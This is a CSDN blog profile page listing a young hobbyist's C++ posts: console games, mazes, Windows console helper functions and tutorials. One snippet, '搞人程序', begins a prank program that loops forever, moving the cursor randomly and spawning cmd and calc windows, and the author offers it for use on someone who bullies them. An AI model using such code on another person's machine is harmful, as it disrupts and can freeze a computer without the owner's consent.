自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(78)
  • 资源 (4)
  • 收藏
  • 关注

原创 一个偶然的猜想

【代码】一个偶然的猜想。

2023-12-28 21:26:20 364

原创 随机数种子生成

【代码】随机数种子生成。

2023-12-28 20:54:27 368

原创 简洁版C++模板

【代码】简洁版C++模板。自我感觉实操时可能还是不用这么麻烦

2023-12-28 20:52:15 376

原创 三种C++常用函数

好久没更新了,这次就来更新一下常用的函数吧。它可以准确的移动的你所指到的地方。

2023-01-15 16:13:48 224 1

原创 你有没有用代码写过暑假作业

你有没有用代码写过暑假作业。

2022-08-12 23:01:56 427 1

原创 switch格式C++

大家可以尝试用switch替代多个if,代码如下格式。

2022-07-21 11:32:04 499

原创 coutAIO.h现已制作完成

我看了饼干的b_game.h感觉很棒,于是我爆肝写出了这个代码:

2022-07-13 09:23:49 100

原创 走迷宫7.0

终于可以运行并且不出bug了,之前的第三关不知道咋回事过不去,干脆把它删了。还有两个尖刺我弄反了,现在bug全修复!

2022-07-01 18:59:08 284 7

原创 C++幕布代码(彩色)

??幕布

2022-07-01 18:34:21 1540

原创 使用海伦公式求三角形面积C++

好好学习!

2022-06-30 14:08:44 1794 3

原创 像素画第一篇C++

像素画

2022-06-29 11:41:53 434

原创 小镇游戏C佳佳

#include<iostream>#include<windows.h>#include<conio.h>#include<unistd.h>#include<cstdlib>#include<time.h>#include<cmath> #include<fstream>#include<bits/stdc++.h>#include<cstdio>#include.

2022-06-29 11:37:04 1554 2

原创 游戏模板C++(控制台)

祝您游戏愉快!

2022-06-29 11:34:41 216

原创 函数C++

一共有所有变量类型加一种函数。多出来的那一个是void函数类型。它们大概这样用:注释够多了,没必要我解释

2022-06-29 09:39:12 146

原创 解题日常C++

OK了

2022-06-19 23:57:08 216

原创 走迷宫C++修改bug6.1

bug已修复

2022-06-12 10:23:19 127

原创 表达错误趣事

妈妈和我说:“去菜市场买个西瓜,如果看到西红柿,就买两个。”回家后,妈妈问我为什么买了两个西瓜 我说:“因为我看到了西红柿。”

2022-06-12 10:06:03 58

原创 gotoC++闲谈

无摘要

2022-06-12 09:44:45 103

原创 游戏开始界面C++3.1

增加亿点点

2022-06-08 12:30:09 1790 3

原创 移动书写位置练习C++

你学废了么?

2022-06-08 12:22:56 57

原创 C++输出爱心

💗#include<stdio.h>#include<Windows.h>int main() { float x, y, a; for (y = 1.5; y > -1.5; y -= 0.1) { for (x = -1.5; x < 1.5; x += 0.05) { a = x * x + y * y - 1; putchar(a * a * a - x * x * y * y * y <= 0.0 ? '*' : ' '

2022-05-29 17:36:38 1212

原创 C语言文件追加及写入及读取

简介被作者删除了

2022-05-21 10:03:47 5521

原创 小镇经营游戏C++实现

好玩的游戏

2022-04-30 08:05:26 1473 3

原创 C++一步解决cls闪烁问题

HANDLE hOut = GetStdHandle(STD_OUTPUT_HANDLE);//定义显示器句柄变量,并且这个只能在每个头文件中单独定义句柄和函数,否则无效 void gotoxy(HANDLE hOut, int x, int y)//其中x,y是与正常理解相反的,注意区分 { COORD pos; pos.X = x; //横坐标 pos.Y = y; //纵坐标 ...

2022-04-18 21:43:35 1495

原创 程序员之歌

歌看看就行了,别笑的太大声了

2022-04-09 20:47:07 593

原创 只有七关的跑酷C++实现

嗨皮时间到!.

2022-04-09 20:35:22 160 5

转载 跑酷游戏C++实现

额……代码有点挤,请不要在乎

2022-04-09 20:31:24 2590 1

原创 运行错误哪位大什帮我一下C++

GetCurrentConsoleFont(hOutput, FALSE, &consoleCurrentFont);

2022-04-09 20:15:03 679

原创 抄写的C++常用函数

void ycgb()//隐藏光标 { CONSOLE_CURSOR_INFO cursor; cursor.bVisible = FALSE; cursor.dwSize = sizeof(cursor); HANDLE handle = GetStdHandle(STD_OUTPUT_HANDLE); SetConsoleCursorInfo(handle, &cursor); return; } void ydgb(long long h, long long .

2022-04-08 18:16:47 683

原创 游戏开始界面C++实现3.0

又新了好几个东东

2022-03-26 10:02:28 1222 5

原创 打砖块C++

happy游戏

2022-03-20 16:15:58 287

原创 设置字体及大小C++

void SetFont(int size = 30) {//hello imX2G CONSOLE_FONT_INFOEX cfi; //hello imX2G cfi.cbSize = sizeof cfi; //hello imX2G cfi.nFont = 0; //hello imX2G cfi.dwFontSize.X = 0; //hello imX2G cfi.dwFontSize.Y = size; //设置字体大小 cfi.FontFamily = FF_DONTCARE.

2022-03-19 21:32:50 4271

原创 C++走迷宫(免费复制)6.0

好玩的走迷宫游戏

2022-03-18 21:21:35 505

原创 最大化计算机窗口C++

void full_screen(){ HWND hwnd = GetForegroundWindow(); int cx = GetSystemMetrics(SM_CXSCREEN); /* 屏幕宽度 像素 */ int cy = GetSystemMetrics(SM_CYSCREEN); /* 屏幕高度 像素 */ LONG l_WinStyle = GetWindowLong(hwnd,GWL_STYLE); .

2022-03-14 20:15:24 193

原创 有趣C++生存游戏

#include #include using namespace std; int choice; int a=0,b=0,c=0,d=0; int user_input; void S(int Color) { HANDLE hCon=GetStdHandle(STD_OUTPUT_HANDLE); SetConsoleTextAttribute(hCon,Color); } void wait() { Sleep(100); user_input=getchar(); } void cls() ...

2022-03-13 23:22:35 710 5

原创 搞人程序C++

(可以搞爱玩游戏还老欺负你的人你可以在他玩的正嗨的时候给他来一下!)#include<bits/stdc++.h>#include<conio.h>#include<windows.h>using namespace std;int main(){ while(1) { SetCursorPos(rand() % 10000,rand() % 10000); system("start cmd"); system("start calc")

2022-03-13 14:18:42 4249 3

原创 C++实现禁用叉号

方案一:void close(){ HWND hwnd = GetConsoleWindow(); HMENU hmenu = GetSystemMenu(hwnd, false); RemoveMenu(hmenu, SC_CLOSE, MF_BYCOMMAND); LONG style = GetWindowLong(hwnd, GWL_STYLE); style &= ~(WS_MINIMIZEBOX); SetWindowLong(hwnd, GWL_STYLE, st

2022-03-13 13:22:43 190

原创 教程5continue和break

一、break和continue的作用  break和continue都是用来控制循环结构的,主要作用是停止循环。二、break和continue的区别1、break用于跳出一个循环体或者完全结束一个循环,不仅可以结束其所在的循环,还可结束其外层循环。注意:(1)只能在循环体内和switch语句体内使用break。(2)不管是哪种循环,一旦在循环体中遇到break,系统将完全结束循环,开始执行循环之后的代码。(3)当break出现在循环体中的switch语句体内时,起作用只是跳出该sw.

2022-03-12 17:19:24 83

原创 游戏开始设置(2.0及3.0)

加了许多哦,重要的是增加了密码哦~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~正题开始!!#inclu

2022-03-12 17:09:28 5711

原创 怎样修改exe可执行文件名

SetConsoleTitle("凑字数凑字数凑字数凑凑凑凑凑凑字数凑字数凑字数凑字数字数凑字数凑字数凑字数字数凑字数凑字数凑字数字数凑字数凑字数凑字数字数凑字数凑字数凑字数字数");凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字.

2022-03-12 16:50:01 1190

坑人游戏坑人游戏坑人游戏C++两个

2022-02-17

CSDN上的各种C++游戏包括自制

愤怒的小鸟,海盗战争等,不少于五个

2022-02-05

whmcs-resellerclub-modules

应用于whmcs的ResellerClub API

2012-08-29

Twitter的这些那些 系统分析Twitter的产品线

CCHere 西西河友撰写的Twitter分析。

2009-12-16

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除